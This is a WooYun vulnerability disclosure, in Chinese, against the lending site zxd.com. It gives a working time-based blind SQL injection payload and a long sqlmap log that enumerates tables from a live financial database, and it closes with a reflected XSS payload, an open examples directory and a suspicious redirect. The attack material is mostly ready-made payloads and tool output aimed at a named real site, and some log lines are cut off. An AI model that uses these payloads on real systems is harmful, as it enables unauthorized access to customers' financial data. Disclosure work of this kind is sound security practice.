WooYun.org

http://www.zxd.com/activity/selectDwActiveList?createTimeParam=&currentPage=2&pageSize=6
算是一个文件泄漏所造成的注入吗？

表太多，time-based blind 跑的太慢就不等了，随便找一个表爆爆
Parameter: createTimeParam (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: createTimeParam=' AND (SELECT * FROM (SELECT(SLEEP(5
LJi'='oLJi&currentPage=2&pageSize=6
---
[18:29:11] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
[18:29:11] [INFO] fetching tables for database: 'zxd'
[18:29:11] [INFO] fetching number of tables for database 'zxd'
[18:29:11] [INFO] resumed: 93
[18:29:11] [WARNING] multi-threading is considered unsafe in time
rieval. Going to switch it off automatically
[18:29:11] [WARNING] time-based comparison requires larger statis
ease wait..............................
[18:29:30] [CRITICAL] considerable lagging has been detected in c
nse(s). Please use as high value for option '--time-sec' as possi
more)
[18:29:35] [WARNING] it is very important not to stress the netwo
ng usage of time-based payloads to prevent potential errors
1 '
[18:33:17] [ERROR] invalid character detected. retrying..
[18:33:17] [WARNING] increasing time delay to 6 seconds
z_job_details
[18:39:56] [INFO] resumed: qrtz_job_log
[18:39:56] [INFO] resumed: 9172747A5F74726
[18:39:56] [INFO] resumed: 75736
[18:39:56] [INFO] resumed: zxd
[18:39:56] [INFO] resumed: z\\?c8d_account_lntry
[18:39:56] [INFO] resumed: 7A78649
[18:39:56] [INFO] retrieved: zxd_account_payable
[18:49:43] [INFO] retrieved: zxd_account_receivable
[18:56:00] [INFO] retrieved: zxd_account_recharge
[19:00:15] [INFO] retrieved: zxd_account_withdraw
[19:06:28] [INFO] retrieved: zxd_active_
[19:10:12] [CRITICAL] unable to connect to the target URL or prox
ing to retry the request
[19:10:12] [WARNING] if the problem persists please try to lower
sed threads (option '--threads')
[19:10:30] [ERROR] invalid character detected. retrying..
[19:10:30] [WARNING] increasing time delay to 7 seconds
config
[19:13:51] [INFO] retrieved: zxd_active_enter
[19:18:02] [INFO] retrieved: zxd_advance_repay
[19:25:07] [INFO] retrieved: zxd_areas
[19:27:40] [INFO] retrieved: zxd_article
[19:31:37] [INFO] retrieved: zxd_audit
[19:34:29] [INFO] retrieved: zxd_balance_sheet
[19:41:37] [INFO] retrieved: zxd_bank_transfer
[19:49:25] [INFO] retrieved: zxd_bank_transfer_log
[19:54:04] [INFO] retrieved: zxd_bid
[19:55:43] [INFO] retrieved: zxd_bid_auto
[19:59:25] [INFO] retrieved: zxd_bid_winner
[20:03:58] [INFO] retrieved: zxd_borrow_company
[20:13:23] [INFO] retrieved: zxd_borrow_expend
[20:18:33] [INFO] retrieved: zxd_borrow_info
[20:22:22] [INFO] retrieved: zxd_borrow_rech
[20:27:34] [ERROR] invalid character detected. retrying..
[20:27:34] [WARNING] increasing time delay to 8 seconds
arge
[20:29:36] [INFO] retrieved: zxd_borrow_request
[20:34:39] [INFO] retrieved: zxd_cs
[20:36:24] [INFO] retrieved: zxd_cs_range
[20:41:12] [INFO] retrieved: zxd_doc_category
[20:49:05] [INFO] retrieved: zxd_dw_active_temp
[20:58:20] [INFO] retrieved: zxd_email
[21:03:12] [ERROR] invalid character detected. retrying..
[21:03:12] [WARNING] increasing time delay to 9 seconds
_list
[21:07:23] [INFO] retrieved: zxd_fee_config
[21:14:49] [INFO] retrieved: zxd_file
[21:17:42] [INFO] retrieved: zxd_funds_month
[21:26:58] [INFO] retrieved: zxd_funds_week
[21:31:19] [INFO] retrieved: zxd_guaranty_corp
[21:41:32] [INFO] retrieved: zxd_in

有一个网页很有意思，不知道是不是挂马了？通过error跳转到一个汽车网站，存在流量偷取的嫌疑....
http://www.zxd.com/examples/jsp/error/err.jsp?submit=Submit&name=integra
会跳转某国外一家汽车网站

还有一个examples目录，不知道是否是公开的，所以不清楚是否是未授权访问,就举一个例子吧
http://www.zxd.com/examples/jsp/cal/cal1.jsp?date=next点击时间，可以添加event

还有一个XSS
http://www.zxd.com:80/tender/borrowList?borrowType=11'%22()%26%25<acx><ScRiPt%20>alert('xss')</ScRiPt>